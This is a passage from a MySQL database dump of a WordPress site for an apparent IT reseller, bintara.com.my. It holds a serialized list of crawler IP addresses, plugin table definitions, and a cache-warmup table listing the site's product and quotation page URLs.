:13:\"207.46.13.224\";i:55;s:12:\"157.55.39.13\";i:56;s:12:\"207.46.13.32\";i:57;s:13:\"207.46.13.165\";i:58;s:13:\"207.46.13.138\";i:59;s:12:\"207.46.13.58\";i:60;s:12:\"40.77.167.59\";i:61;s:13:\"207.46.13.233\";i:62;s:13:\"157.55.39.139\";i:63;s:13:\"207.46.13.249\";i:64;s:13:\"207.46.13.196\";i:65;s:13:\"157.55.39.199\";i:66;s:13:\"207.46.13.218\";i:67;s:12:\"40.77.167.64\";i:68;s:12:\"40.77.167.33\";i:69;s:13:\"40.77.167.154\";i:70;s:13:\"40.77.167.118\";i:71;s:13:\"207.46.13.156\";i:72;s:13:\"157.55.39.210\";i:73;s:12:\"157.55.39.49\";i:74;s:13:\"40.77.167.145\";i:75;s:12:\"40.77.167.11\";i:76;s:13:\"157.55.39.135\";i:77;s:12:\"207.46.13.26\";i:78;s:13:\"207.46.13.195\";i:79;s:13:\"207.46.13.101\";i:80;s:12:\"40.77.167.29\";i:81;s:12:\"157.55.39.67\";i:82;s:13:\"40.77.167.131\";i:83;s:11:\"40.77.167.6\";i:84;s:13:\"207.46.13.148\";i:85;s:12:\"157.55.39.12\";i:86;s:13:\"157.55.39.140\";i:87;s:13:\"157.55.39.198\";i:88;s:13:\"207.46.13.199\";i:89;s:12:\"207.46.13.62\";i:90;s:13:\"40.77.167.182\";i:91;s:13:\"207.46.13.121\";i:92;s:12:\"157.55.39.69\";i:93;s:13:\"40.77.167.137\";i:94;s:13:\"207.46.13.179\";i:95;s:13:\"40.77.167.116\";i:96;s:12:\"40.77.167.38\";i:97;s:13:\"207.46.13.152\";i:98;s:13:\"40.77.167.117\";i:99;s:13:\"40.77.167.114\";i:100;s:13:\"157.55.39.188\";i:101;s:13:\"157.55.39.182\";i:102;s:12:\"40.77.167.99\";i:103;s:13:\"40.77.167.177\";i:104;s:13:\"157.55.39.169\";i:105;s:13:\"40.77.167.198\";i:106;s:12:\"207.46.13.80\";i:107;s:13:\"207.46.13.163\";i:108;s:13:\"40.77.167.100\";i:109;s:12:\"40.77.167.42\";i:110;s:13:\"157.55.39.120\";i:111;s:11:\"40.77.167.2\";i:112;s:12:\"40.77.167.74\";i:113;s:13:\"157.55.39.211\";i:114;s:12:\"157.55.39.86\";i:115;s:13:\"207.46.13.234\";i:116;s:13:\"40.77.167.175\";i:117;s:13:\"157.55.39.194\";i:118;s:12:\"207.46.13.99\";i:119;s:12:\"207.46.13.24\";i:120;s:13:\"40.77.167.163\";i:121;s:13:\"207.46.13.217\";i:122;s:12:\"157.55.39.81\";i:123;s:13:\"207.46.13.241\";i:124;s:13:\"40.77.167.127\";i:125;s:12:\"207.46.13.48\";i:126;s:11:\"40.77.167.7\";i:127;s:13:\"157.55.39.125\";i:128;s:13:\"40.77.167.179\";i:129;s:13:\"207.46.13.167\";i:130;s:13:\"207.46.13.187\";i:131;s:12:\"40.77.167.22\";i:132;s:12:\"157.55.39.95\";i:133;s:11:\"157.55.39.7\";i:134;s:13:\"157.55.39.102\";i:135;s:13:\"157.55.39.151\";i:136;s:13:\"207.46.13.176\";i:137;s:13:\"40.77.167.120\";i:138;s:13:\"157.55.39.178\";i:139;s:13:\"157.55.39.180\";i:140;s:13:\"157.55.39.179\";i:141;s:13:\"207.46.13.183\";i:142;s:12:\"40.77.167.32\";i:143;s:13:\"157.55.39.134\";i:144;s:13:\"40.77.167.169\";i:145;s:13:\"40.77.167.215\";i:146;s:13:\"157.55.39.239\";i:147;s:13:\"157.55.39.181\";i:148;s:13:\"157.55.39.177\";i:149;s:13:\"157.55.39.227\";i:150;s:12:\"157.55.39.54\";i:151;s:13:\"40.77.167.150\";i:152;s:12:\"157.55.39.60\";i:153;s:12:\"40.77.167.19\";i:154;s:13:\"40.77.167.212\";i:155;s:13:\"157.55.39.220\";i:156;s:13:\"40.77.167.112\";i:157;s:12:\"207.46.13.82\";i:158;s:13:\"207.46.13.166\";i:159;s:12:\"207.46.13.96\";i:160;s:13:\"157.55.39.145\";i:161;s:12:\"207.46.13.21\";i:162;s:13:\"40.77.167.197\";i:163;s:12:\"207.46.13.18\";i:164;s:12:\"40.77.167.35\";i:165;s:13:\"157.55.39.122\";i:166;s:12:\"207.46.13.46\";i:167;s:12:\"157.55.39.56\";i:168;s:13:\"157.55.39.118\";i:169;s:13:\"40.77.167.159\";i:170;s:13:\"207.46.13.197\";i:171;s:12:\"207.46.13.54\";i:172;s:11:\"157.55.39.4\";i:173;s:13:\"157.55.39.161\";i:174;s:12:\"40.77.167.70\";i:175;s:13:\"40.77.167.101\";i:176;s:13:\"157.55.39.126\";i:177;s:13:\"207.46.13.191\";i:178;s:13:\"40.77.167.178\";i:179;s:13:\"207.46.13.115\";i:180;s:12:\"157.55.39.99\";i:181;s:12:\"207.46.13.88\";i:182;s:13:\"157.55.39.255\";i:183;s:13:\"157.55.39.166\";i:184;s:12:\"40.77.167.50\";i:185;s:12:\"40.77.167.17\";i:186;s:12:\"157.55.39.10\";i:187;s:12:\"207.46.13.12\";i:188;s:13:\"207.46.13.164\";i:189;s:13:\"207.46.13.128\";i:190;s:13:\"207.46.13.178\";i:191;s:13:\"157.55.39.124\";i:192;s:13:\"157.55.39.253\";i:193;s:13:\"207.46.13.106\";i:194;s:13:\"157.55.39.108\";i:195;s:13:\"157.55.39.167\";i:196;s:13:\"207.46.13.110\";i:197;s:13:\"207.46.13.111\";i:198;s:13:\"157.55.39.107\";i:199;s:12:\"207.46.13.59\";i:200;s:13:\"207.46.13.139\";i:201;s:13:\"207.46.13.103\";i:202;s:13:\"40.77.167.102\";i:203;s:13:\"207.46.13.141\";i:204;s:13:\"40.77.167.149\";i:205;s:13:\"157.55.39.168\";i:206;s:12:\"40.77.167.71\";i:207;s:13:\"207.46.13.175\";i:208;s:13:\"207.46.13.125\";i:209;s:12:\"207.46.13.72\";i:210;s:13:\"157.55.39.131\";i:211;s:13:\"157.55.39.204\";i:212;s:13:\"207.46.13.116\";i:213;s:13:\"207.46.13.247\";i:214;s:12:\"157.55.39.47\";i:215;s:11:\"207.46.13.4\";i:216;s:13:\"40.77.167.207\";i:217;s:13:\"157.55.39.137\";i:218;s:12:\"40.77.167.18\";i:219;s:13:\"207.46.13.174\";i:220;s:13:\"207.46.13.189\";i:221;s:13:\"207.46.13.212\";i:222;s:13:\"157.55.39.158\";i:223;s:12:\"40.77.167.85\";i:224;s:12:\"207.46.13.63\";i:225;s:12:\"207.46.13.52\";i:226;s:12:\"40.77.167.54\";i:227;s:13:\"157.55.39.202\";i:228;s:11:\"40.77.167.5\";i:229;s:13:\"157.55.39.195\";i:230;s:12:\"207.46.13.73\";i:231;s:12:\"40.77.167.21\";i:232;s:13:\"157.55.39.152\";i:233;s:12:\"157.55.39.98\";i:234;s:12:\"157.55.39.55\";i:235;s:12:\"157.55.39.83\";i:236;s:11:\"40.77.167.3\";i:237;s:12:\"207.46.13.35\";i:238;s:13:\"157.55.39.147\";i:239;s:13:\"40.77.167.156\";i:240;s:12:\"157.55.39.70\";i:241;s:12:\"40.77.167.25\";i:242;s:12:\"157.55.39.79\";i:243;s:12:\"207.46.13.65\";i:244;s:13:\"157.55.39.154\";i:245;s:13:\"157.55.39.237\";i:246;s:13:\"157.55.39.252\";i:247;s:12:\"157.55.39.89\";i:248;s:11:\"207.46.13.7\";i:249;s:12:\"157.55.39.92\";i:250;s:11:\"207.46.13.6\";i:251;s:13:\"157.55.39.186\";i:252;s:13:\"40.77.167.143\";i:253;s:13:\"157.55.39.127\";i:254;s:13:\"207.46.13.157\";i:255;s:12:\"157.55.39.94\";i:256;s:13:\"40.77.167.124\";i:257;s:13:\"40.77.167.171\";i:258;s:13:\"157.55.39.234\";i:259;s:11:\"207.46.13.1\";i:260;s:13:\"40.77.167.161\";i:261;s:12:\"207.46.13.86\";i:262;s:13:\"157.55.39.153\";i:263;s:13:\"207.46.13.170\";i:264;s:13:\"40.77.167.153\";i:265;s:12:\"40.77.167.94\";i:266;s:12:\"207.46.13.98\";i:267;s:13:\"157.55.39.203\";i:268;s:13:\"207.46.13.120\";i:269;s:13:\"157.55.39.123\";i:270;s:11:\"13.66.139.0\";i:271;s:12:\"40.77.167.49\";i:272;s:13:\"40.77.167.132\";i:273;s:13:\"40.77.167.195\";i:274;s:13:\"207.46.13.252\";i:275;s:12:\"207.46.13.71\";i:276;s:12:\"40.77.167.81\";i:277;s:12:\"207.46.13.53\";i:278;s:13:\"157.55.39.191\";i:279;s:13:\"40.77.167.148\";i:280;s:12:\"40.77.167.48\";i:281;s:11:\"207.46.13.8\";i:282;s:13:\"157.55.39.129\";i:283;s:12:\"207.46.13.81\";i:284;s:13:\"40.77.167.155\";i:285;s:12:\"40.77.167.67\";i:286;s:13:\"157.55.39.112\";i:287;s:12:\"207.46.13.75\";i:288;s:13:\"40.77.167.222\";i:289;s:12:\"207.46.13.34\";i:290;s:12:\"207.46.13.19\";i:291;s:12:\"207.46.13.70\";i:292;s:12:\"40.77.167.20\";i:293;s:12:\"207.46.13.41\";i:294;s:12:\"157.55.39.59\";i:295;s:13:\"157.55.39.228\";i:296;s:13:\"157.55.39.103\";i:297;s:13:\"157.55.39.113\";i:298;s:12:\"40.77.167.55\";i:299;s:13:\"207.46.13.229\";i:300;s:12:\"40.77.167.98\";i:301;s:13:\"157.55.39.142\";i:302;s:13:\"157.55.39.226\";i:303;s:12:\"207.46.13.89\";i:304;s:12:\"207.46.13.90\";i:305;s:13:\"157.55.39.206\";i:306;s:12:\"40.77.167.27\";i:307;s:13:\"40.77.167.103\";i:308;s:13:\"40.77.167.186\";i:309;s:13:\"207.46.13.108\";i:310;s:13:\"207.46.13.107\";i:311;s:13:\"207.46.13.177\";i:312;s:12:\"157.55.39.91\";i:313;s:12:\"157.55.39.65\";i:314;s:13:\"207.46.13.109\";i:315;s:13:\"40.77.167.130\";i:316;s:13:\"40.77.167.129\";i:317;s:13:\"40.77.167.121\";i:318;s:12:\"157.55.39.80\";i:319;s:12:\"40.77.167.60\";i:320;s:13:\"207.46.13.135\";i:321;s:12:\"157.55.39.41\";i:322;s:13:\"157.55.39.133\";i:323;s:12:\"40.77.167.45\";i:324;s:13:\"207.46.13.208\";i:325;s:13:\"207.46.13.153\";i:326;s:12:\"40.77.167.91\";i:327;s:13:\"207.46.13.151\";i:328;s:13:\"157.55.39.214\";i:329;s:13:\"207.46.13.192\";i:330;s:13:\"157.55.39.207\";i:331;s:12:\"207.46.13.79\";i:332;s:12:\"40.77.167.86\";i:333;s:12:\"157.55.39.35\";i:334;s:12:\"207.46.13.87\";i:335;s:13:\"157.55.39.238\";i:336;s:13:\"157.55.39.201\";i:337;s:12:\"157.55.39.57\";i:338;s:12:\"157.55.39.72\";i:339;s:13:\"40.77.167.107\";i:340;s:12:\"40.77.167.26\";}');
/*!40000 ALTER TABLE `wpdp_sitemeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_smush_dir_images`
--

DROP TABLE IF EXISTS `wpdp_smush_dir_images`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_smush_dir_images` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `path` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `path_hash` char(32) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `resize` varchar(55) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `lossy` varchar(55) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `error` varchar(55) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `image_size` int(10) unsigned DEFAULT NULL,
  `orig_size` int(10) unsigned DEFAULT NULL,
  `file_time` int(10) unsigned DEFAULT NULL,
  `last_scan` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `meta` text COLLATE utf8mb4_unicode_ci,
  UNIQUE KEY `id` (`id`),
  UNIQUE KEY `path_hash` (`path_hash`),
  KEY `image_size` (`image_size`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_smush_dir_images`
--

LOCK TABLES `wpdp_smush_dir_images` WRITE;
/*!40000 ALTER TABLE `wpdp_smush_dir_images` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_smush_dir_images` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_swift_performance_warmup`
--

DROP TABLE IF EXISTS `wpdp_swift_performance_warmup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_swift_performance_warmup` (
  `id` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  `url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `priority` int(10) NOT NULL,
  `menu_item` tinyint(1) NOT NULL,
  `timestamp` int(11) NOT NULL,
  `type` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `url` (`url`(250)),
  KEY `priority` (`priority`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_swift_performance_warmup`
--

LOCK TABLES `wpdp_swift_performance_warmup` WRITE;
/*!40000 ALTER TABLE `wpdp_swift_performance_warmup` DISABLE KEYS */;
INSERT INTO `wpdp_swift_performance_warmup` (`id`, `url`, `priority`, `menu_item`, `timestamp`, `type`) VALUES ('4b9864f4017b1d49c323692bdceb9e83','http://bintara.com.my/staging/wp-admin/mysql-adminer.php',40,0,0,''),('cfe4226996bab8321cdd6991c57929b0','http://bintara.com.my/blog/wp-admin/mysql-adminer.php',40,0,0,''),('e0b41b96cc23311fa9c9c88990bd1630','https://bintara.com.my/sample-page/',20,0,0,''),('9f931a7461d6d7a56bfd8ae994b1bd54','https://bintara.com.my/blog/category/one-page/',30,0,0,''),('5016e58cc13452e9bfee6b052d28e175','https://bintara.com.my/about/',40,1,0,''),('c3498f72c3a34821da8065990a8534f4','https://bintara.com.my/get-quotation-targus/',50,0,0,''),('321acde195ee129636685783253c2874','https://bintara.com.my/targus/',60,0,0,''),('19cb0ddcdc029e76d62b50e03465b5da','https://bintara.com.my/blog/portfolio/targus/',70,0,0,''),('ac3c73ed5cecd74f2c6f899c758b0a5c','https://bintara.com.my/get-quotation-dell/',80,0,0,''),('c72162b82bef5fc5fa59d4cfda4aef76','https://bintara.com.my/blog/portfolio/dell/',90,0,0,''),('ba9e66fdc6d93f1b4023f8ba0a14ed95','https://bintara.com.my/dell/',100,0,0,''),('793c6731f4ee2f8602fa3123e66fe056','https://bintara.com.my/arcadia/',110,0,0,''),('6d3f959629deea6634cf461457eaef3e','https://bintara.com.my/blog/portfolio/arcadia/',120,0,0,''),('e704f8a049c993fb53e88adcc7e48a21','https://bintara.com.my/dell-large-displays/',130,0,0,''),('f0ff9b5e877873a68a065ccfd723df23','https://bintara.com.my/jabra-panacast/',140,0,0,''),('e835ce41bd8e1ffac3a99e797d6505c8','https://bintara.com.my/zoom-meetings-chat/',150,0,0,''),('91d9a831b518c1bd65d85f3e38bd5a39','https://bintara.com.my/logitech-smartdock/',160,0,0,''),('cd8b36384c5ef74d676c28449a39ee62','https://bintara.com.my/logitech-h570e-headset/',170,0,0,''),('0f59317d7a6f696e0b270c793f00d635','https://bintara.com.my/logitech-b525/',180,0,0,''),('3b8c7822fe615b49da78e7f16ffa479a','https://bintara.com.my/logitech-c925e/',190,0,0,''),('0d2d61dac3cd5dcc95c4e8d7ea36a954','https://bintara.com.my/logitech-c930e/',200,0,0,''),('74517a7aab2c74a5d775c455d3927bba','https://bintara.com.my/logitech-brio/',210,0,0,''),('341a3505c131465245cfeaa0617d576c','https://bintara.com.my/logitech-bcc950/',220,0,0,''),('674e523aadad118c79703eed7e834651','https://bintara.com.my/logitech-ptz-pro-2/',230,0,0,''),('e706b703f4a2e8241eae43202565b3fd','https://bintara.com.my/logitech-connect/',240,0,0,''),('9586a496a2cd2f9db4fa6c7d0710fe82','https://bintara.com.my/logitech-meetup/',250,0,0,''),('ded2cd67e175529881277fd6e67a0023','https://bintara.com.my/logitech-rally/',260,0,0,''),('8c9e7657973301d1eb79669118565f57','https://bintara.com.my/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/',270,0,0,''),('d9039d566bddee9c583f7f94000c2d51','https://bintara.com.my/logitech-rally-camera/',280,0,0,''),('c77feafd23581172b25250fdd6bb3f8d','https://bintara.com.my/get-quotation-jabra-evolve/',290,0,0,''),('1f5558a9863aebd744b8fcf174980028','https://bintara.com.my/benq/',300,0,0,''),('23265b7693061422bc6fe29fda14e09b','https://bintara.com.my/get-quotation-hpe/',310,0,0,''),('be438629f6278389f75939f5d5ca801d','https://bintara.com.my/get-quotation-epson/',320,0,0,''),('f45988f2dd5e5aaf91c57f089897a3dd','https://bintara.com.my/get-quotation-canon/',330,0,0,''),('169dfda421e820d779a93d018be8e0e6','https://bintara.com.my/get-quotation-broadbase/',340,0,0,''),('1f0cef2d8e076b6695c6ec7252154c47','https://bintara.com.my/get-quotation-belkin/',350,0,0,''),('3648daf8a4084ac3f8ff80980be7c7bb','https://bintara.com.my/get-quotation-asus/',360,0,0,''),('b1c994dd01a6ec4471ffc9bb4bf347a6','https://bintara.com.my/get-quotation-acer/',370,0,0,''),('72c19fe630fc82308b0eb21fb52e65a5','https://bintara.com.my/get-quotation-d-link/',380,0,0,''),('6ea95f3c806b0fb391d9c2de9648cab5','https://bintara.com.my/get-quotation-panasonic-toughbook/',390,0,0,''),('b4d4628a2b105554c72942f7b0233d27','https://bintara.com.my/panasonic-toughbook-product/',400,0,0,''),('0f2c49c4697dec3d6bfc8ffdded111fb','https://bintara.com.my/blog/portfolio/honeywell/',410,0,0,''),('02ca90d92ef091cdeb2681c7c6dd9cf6','https://bintara.com.my/honeywell/',420,0,0,''),('067932740203bfba1354c8c2ea3464e5','https://bintara.com.my/bluejeans/',430,0,0,''),('4a8be8ac15fc04f97cb7cc3c6ef74a07','https://bintara.com.my/video-conferencing-solutions/',440,0,0,''),('e58d650319f4a8b044e0736b2db4dc97','https://bintara.com.my/logitech-group/',450,0,0,''),('28d57fa6ad03d62e110752a5ed1e3cfa','https://bintara.com.my/blog/2018/12/12/onepress/',460,0,0,''),('4d234cc9ba6a06ef83cdd3aa9ddc89f6','https://bintara.com.my/broadbase/',470,0,0,''),('5597c42f3ddc4a7ce582bd456ac18d2d','https://bintara.com.my/get-quotation-logitech/',480,0,0,''),('938e79fb7bc95800afebe92dc7c08934','https://bintara.com.my/gototraining/',490,0,0,'error'),('39026461114221ce42232112c968e0ca','https://bintara.com.my/gotowebinar/',500,0,1573721033,'html'),('f78352eb0c99816fac71ae1581e9edc2','https://bintara.com.my/gotomeeting/',510,0,0,''),('075e04da19b2f0af6cb817aaaf65deea','https://bintara.com.my/blog/portfolio/gototraining/',520,0,0,''),('23b7eb93ac36f467a3057367cebe8089','https://bintara.com.my/blog/portfolio/gotowebinar/',530,0,0,''),('062a9dc640877bb0b73cf631b4cc7561','https://bintara.com.my/blog/portfolio/gotomeeting/',540,0,0,''),('8fab087ca2c78123ca3590f49bd587e6','https://bintara.com.my/teamviewer/',550,0,0,''),('6437d257d38e6254a7d76651f7c0624c','https://bintara.com.my/storagecraft/',560,0,0,''),('29d127e1f41dafd57b79f12d90a60bc7','https://bintara.com.my/zoom/',570,0,0,''),('d6d2473dccbe01b0bf4a20c63cfaef3d','https://bintara.com.my/zebra/',580,0,0,''),('140fbb4ec2bffc4a7a1d39be9e40904f','https://bintara.com.my/winrar/',590,0,0,''),('6070fa141b37b6be03c1fee39fa9d742','https://bintara.com.my/western-digital/',600,0,0,''),('aeb1cb381e7ce925da3321360b26373d','https://bintara.com.my/watchguard/',610,0,0,''),('59db9fd2274516fc8c8fdf5dc6e0e18c','https://bintara.com.my/wacom/',620,0,0,''),('e957848625215bebc36046cee13d1d2f','https://bintara.com.my/veritas/',630,0,0,''),('1dcb3cf8641de2673c313635ae88d09c','https://bintara.com.my/veeam/',640,0,0,''),('436309d237e06434d034f4776c3f9961','https://bintara.com.my/ubiquiti/',650,0,0,''),('261e037494806bddcaa67996274fea6b','https://bintara.com.my/synology/',660,0,1573722163,'html'),('fdc8a6a6cf6414e036cc9b09d5c4b54b','https://bintara.com.my/sophos/',670,0,0,''),('8b3d85b56101dbdd73cd5f3cafd3b9af','https://bintara.com.my/solarwinds/',680,0,0,''),('dd7d0dbb1860b567fa412cdfd1561639','https://bintara.com.my/seagate/',690,0,0,''),('225d3df951c857615b06921d63c98169','https://bintara.com.my/samsung/',700,0,0,''),('df480132bfe5736610ba6918d7077d7e','https://bintara.com.my/sage/',710,0,0,''),('205a94235e8c3d46c52ff82721a98dcd','https://bintara.com.my/ruckus/',720,0,0,''),('09a1ea34514e67eb7b64faea06cc278c','https://bintara.com.my/redhat/',730,0,0,''),('b6325e2e9602b673c4cbc8962f5ff601','https://bintara.com.my/qnap/',740,0,0,''),('44b913d6f1f1f07e987892725c727bdb','https://bintara.com.my/qator-enterprise/',750,0,0,''),('03a00bbc6086289a5d3d51a6946fba2c','https://bintara.com.my/qator-investigator/',760,0,0,''),('933f42f2665abb44164c02f608f16b58','https://bintara.com.my/qator-live/',770,0,0,''),('e3950a8305d4f7138ec62b81b010e148','https://bintara.com.my/peplink/',780,0,0,''),('ed680363b8078ac83b76ee13738aede2','https://bintara.com.my/panasonic-toughbook/',790,0,1573709963,'html'),('960f822f235a7022ab34c254c2a1c2ba','https://bintara.com.my/panasonic/',800,0,0,''),('66d74cd1e58ae6c021f58fb3d69a7732','https://bintara.com.my/paloalto/',810,0,0,''),('2afe7a8f4866ee2c2236e96bdb5f3f09','https://bintara.com.my/nvivo/',820,0,1573725775,'html'),('70831facd524b18b4245e41c0ce00fcb','https://bintara.com.my/nutanix/',830,0,0,''),('94a76545ae16ffa7043a6efa0986555b','https://bintara.com.my/nuance/',840,0,0,''),('3894fc775192d84f3c5907d75518698c','https://bintara.com.my/nitro/',850,0,0,''),('bd98d45e204c78abda3d10be6281ee0f','https://bintara.com.my/netapp/',860,0,0,''),('d8fee14d2be7905997b4b2e7e83b6bce','https://bintara.com.my/microsoft/',870,0,1573728129,'html'),('fcea15bbb299d34fde9d59db22cbd603','https://bintara.com.my/motorola/',880,0,0,''),('a73fb0be75d4105fe7b706c4b50f1e3f','https://bintara.com.my/mcafee/',890,0,0,''),('4a96972b7d1eda36cf741c7d2d060ed8','https://bintara.com.my/mapinfo/',900,0,0,''),('b44c97293ee0b0951b79ca549bf8d160','https://bintara.com.my/lg/',910,0,1573709698,'html'),('03dfb6bcd9299a9c12a2e5ddf975266d','https://bintara.com.my/lenovo/',920,0,1573721579,'html'),('1a5d0218201de94781c7998e7028d73d','https://bintara.com.my/kingston/',930,0,0,''),('58a4059e2ca7c534b597c819c1ba044d','https://bintara.com.my/kaspersky/',940,0,1573748582,'html'),('96e36605c67d79dceef3bbc95bbbadba','https://bintara.com.my/juniper/',950,0,0,''),('6663bdc06abf79e002c403c47486b4fb','https://bintara.com.my/jabra/',960,0,0,''),('148cb805bc61d5142f3ddf9cd6c82ca0','https://bintara.com.my/infocus/',970,0,0,''),('3d75d929ad4d088e1065aa81059a852b','https://bintara.com.my/ibm/',980,0,0,''),('c6619554f24b80243a3388a7fe1a5a73','https://bintara.com.my/huawei/',990,0,1573713854,'html'),('ce07a164781280f90eb649683c505528','https://bintara.com.my/hpe/',1000,0,1573736936,'html'),('959bd09a7d1e374587cafffd8fbb8bbb','https://bintara.com.my/designjet-large-format-office-printers/',1010,0,0,''),('101609f4f294a5aa69fcf3cc10bc6ee2','https://bintara.com.my/houdini/',1020,0,1573751360,'html'),('9029a9a0a3dc35ca55b25efbdc024e66','https://bintara.com.my/fujixerox/',1030,0,0,''),('3891ecf51bb6990c7fd3527e336dbc82','https://bintara.com.my/fortinet/',1040,0,0,''),('ad884ef06b4579b54ec1885c01754db3','https://bintara.com.my/faronics/',1050,0,0,''),('748c2a375ed0e050b431a109e72c78bc','https://bintara.com.my/eset/',1060,0,0,''),('70a0600fbf2e3911dff761f32f8d8e1a','https://bintara.com.my/ergotron/',1070,0,0,''),('2b5d8403404c0f45cbbb466e000d3e29','https://bintara.com.my/epson/',1080,0,0,''),('b921ebb48b66a631ef0c29115d0d61ef','https://bintara.com.my/blog/portfolio/zoom/',1090,0,0,''),('687b319adba10c90b67d3634c0592c38','https://bintara.com.my/blog/portfolio/zebra/',1100,0,0,''),('4913a2a9e73d1cbed223631aa249ee13','https://bintara.com.my/blog/portfolio/winrar/',1110,0,0,''),('959936df8ce28c48d6cb8e77aaacb3b3','https://bintara.com.my/blog/portfolio/western-digital/',1120,0,0,''),('0b47ed6f6863ef6259b2890a2422ae04','https://bintara.com.my/dropbox/',1130,0,1573737152,'html'),('3612211bda186e730ea9835c1b7bce8d','https://bintara.com.my/blog/portfolio/watchguard/',1140,0,0,''),('dad821f0da4364b7d9a6f35843f60b47','https://bintara.com.my/blog/portfolio/wacom/',1150,0,0,''),('096b423483682c54c0cac801d88eb65b','https://bintara.com.my/docusign/',1160,0,0,''),('b7f141fc39a322831f9347d386f0e25b','https://bintara.com.my/blog/portfolio/veritas/',1170,0,0,''),('7e1c5642c2f69415410f8e4dcc2c66d9','https://bintara.com.my/d-link/',1180,0,0,''),('cb41bf6fc66cdc5a527ddabfd238819c','https://bintara.com.my/blog/portfolio/veeam/',1190,0,0,''),('7b22c0febb2de8012883026639a8976c','https://bintara.com.my/dell-emc/',1200,0,1573708019,'html'),('b0ecc641061f7d84a5fcd46da93ee99b','https://bintara.com.my/coreldraw/',1210,0,1573713857,'html'),('9b5735301692b48ebcbc64db5dd61e7e','https://bintara.com.my/blog/portfolio/ubiquiti/',1220,0,0,''),('fab728136c060b2eb9e3c5fa03ca6954','https://bintara.com.my/blog/portfolio/teamviewer/',1230,0,0,''),('ea60a8893bd95155db709a02c89d4d2f','https://bintara.com.my/autodesk/',1240,0,0,''),('be5c7df6eb3ce0c9c4ff1467f6c91de5','https://bintara.com.my/cisco/',1250,0,1573708472,'html'),('104f83e86d4657cd42c220e539dd1f35','https://bintara.com.my/blog/portfolio/synology/',1260,0,0,''),('601705c0c38f95f47e5659c607d59d8a','https://bintara.com.my/canon/',1270,0,0,''),('04bc55d79389de121478f89b475697e7','https://bintara.com.my/cambium/',1280,0,0,''),('56204bdda568bdcd77db2001ca610052','https://bintara.com.my/blog/portfolio/storagecraft/',1290,0,0,''),('72912dd17cc911427a98543133778c61','https://bintara.com.my/bitdefender/',1300,0,0,''),('29342f10723caceca67d35be8c54f8b0','https://bintara.com.my/benq-rp704k-4k-uhd-70/',1310,0,1573745976,'html'),('5355c0595d45411a9f2ade31b19976cd','https://bintara.com.my/belkin/',1320,0,0,''),('927231274bb726ab621315262639ef37','https://bintara.com.my/barracuda/',1330,0,0,''),('e71e3606cec9d614fbdcebb2e6e08031','https://bintara.com.my/atlas-ti/',1340,0,0,''),('9df7b7635c426147adc3a2131a34f306','https://bintara.com.my/blog/portfolio/sophos/',1350,0,0,''),('d47b2465d7aeb9be9d0491afb8dac442','https://bintara.com.my/asus/',1360,0,0,''),('66dbd3235deb5f851a704ee74c88b5ca','https://bintara.com.my/aruba/',1370,0,0,''),('eefb66feabf226fb4b6c8eb23dde7dfc','https://bintara.com.my/apple/',1380,0,1573719254,'html'),('8825c9e4bad53b2af08b499044fe0b27','https://bintara.com.my/apc/',1390,0,0,''),('cac0976f8244496ec827c34a88f29300','https://bintara.com.my/anydesk/',1400,0,0,''),('3a0fb4e94dc8e944210cc00ea1a43b4f','https://bintara.com.my/adobe/',1410,0,0,''),('c20209db49af34a383f05729a2d2afc9','https://bintara.com.my/acronis/',1420,0,0,''),('c93dbadd82fe613f85daf958ee7a25a8','https://bintara.com.my/blog/portfolio/solarwinds/',1430,0,0,''),('7caba156afb0a14ab65f8609a3625ddd','https://bintara.com.my/blog/portfolio/seagate/',1440,0,0,''),('50309e5373b4e61b859645de0af55185','https://bintara.com.my/acer/',1450,0,0,''),('22b3f7d0e6f1a447e21f397b07293ed6','https://bintara.com.my/blog/portfolio/samsung/',1460,0,0,''),('bd23cfa20a39e535dc2f54e8bfcd88e0','https://bintara.com.my/blog/portfolio/sage/',1470,0,0,''),('12cfcdc4744070c9a6671723e4d09c93','https://bintara.com.my/blog/portfolio/ruckus/',1480,0,0,''),('6ba22098852b040a1bfdc273f39859f2','https://bintara.com.my/blog/portfolio/redhat/',1490,0,0,''),('9e86fd4fb56a3899172b646156c48a3a','https://bintara.com.my/blog/portfolio/qnap/',1500,0,0,''),('f003124912c0385a34ba61037caf9b85','https://bintara.com.my/blog/portfolio/peplink/',1510,0,0,''),('3ac192247a7f8cd0e8413272e07fb4e5','https://bintara.com.my/blog/portfolio/panasonic-toughbook/',1520,0,0,''),('576459fa72fe457de0dcade475f1bf6b','https://bintara.com.my/blog/portfolio/panasonic/',1530,0,0,''),('d450d3e720a36f788493bb3cb9f92ec8','https://bintara.com.my/blog/portfolio/paloalto/',1540,0,0,''),('9dab39d6101d4513479d303b3061f23b','https://bintara.com.my/blog/portfolio/nvivo/',1550,0,0,''),('47a408193dd6f175be2fe69b072863e6','https://bintara.com.my/blog/portfolio/nutanix/',1560,0,0,''),('c1cc90240b68d828c8d33c0a3cb9e458','https://bintara.com.my/blog/portfolio/nuance/',1570,0,0,''),('ecd4c1655611f2d66e7c7efc132e8eee','https://bintara.com.my/blog/portfolio/nitro/',1580,0,0,''),('1f920b33c9b45f0b1ea8e02af2d01a58','https://bintara.com.my/